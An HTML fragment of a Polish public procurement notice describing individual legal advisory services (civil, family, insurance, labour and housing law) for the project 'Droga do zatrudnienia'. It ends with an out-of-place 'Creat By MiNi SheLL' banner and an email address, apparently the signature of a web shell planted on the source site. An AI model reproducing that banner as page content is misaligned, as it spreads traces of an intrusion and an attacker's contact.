1.	Doradztwo: od 10 do 1080h w okresie trwania projektu. (godzina zegarowa=60 minut).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi doradcze- doradztwo indywidualne z zakresu prawa dla uczestników projektu Droga do zatrudnienia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny zakres: 
1. Prawo cywilne:
poradnictwo z zakresu prawa zobowiązań,
poradnictwo z zakresu postępowania nieprocesowego,
poradnictwo z zakresu postępowań nakazowych i upominawczych.

2.	Prawo rodzinne:
poradnictwo i sporządzanie pozwów i pism procesowych w sprawach rozwodowych i separacyjnych,
poradnictwo i sporządzanie pozwów i pism procesowych w sprawach,
poradnictwo w zakresie rozdzielności majątkowej

3.	Prawo ubezpieczeń:
poradnictwo z zakresu spraw emerytalno - rentowych,
sporządzanie odwołań i pism procesowych w sprawach związanych z odwołaniami od decyzji ZUS-u,

4.	Poradnictwo z zakresu prawa pracy

5.	Poradnictwo - wraz ze sporządzaniem pism, wniosków i skarg - w postępowaniu z zakresu egzekucji administracyjnej i sądowej.



6.	Prawo lokalowe i ochrona praw lokatorów:
sprawy dotyczące uzyskania lub odzyskania tytułu prawnego do lokalu
poradnictwo z zakresu spraw dotyczących praw i obowiązków właścicieli, najemców, podnajemców itp.


Zakres i tematyka doradztwa związana będzie z bieżącymi potrzebami uczestników projektu Droga do zatrudnienia.


1.	Doradztwo: średnio 30h miesięcznie, nie więcej niż 120 h (godzina zegarowa=60 minut)

Doradztwo indywidualne:
w dni powszednie od poniedziałku do piątku w godzinach 9,00-15,00 w okresie VI-IX.2011r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com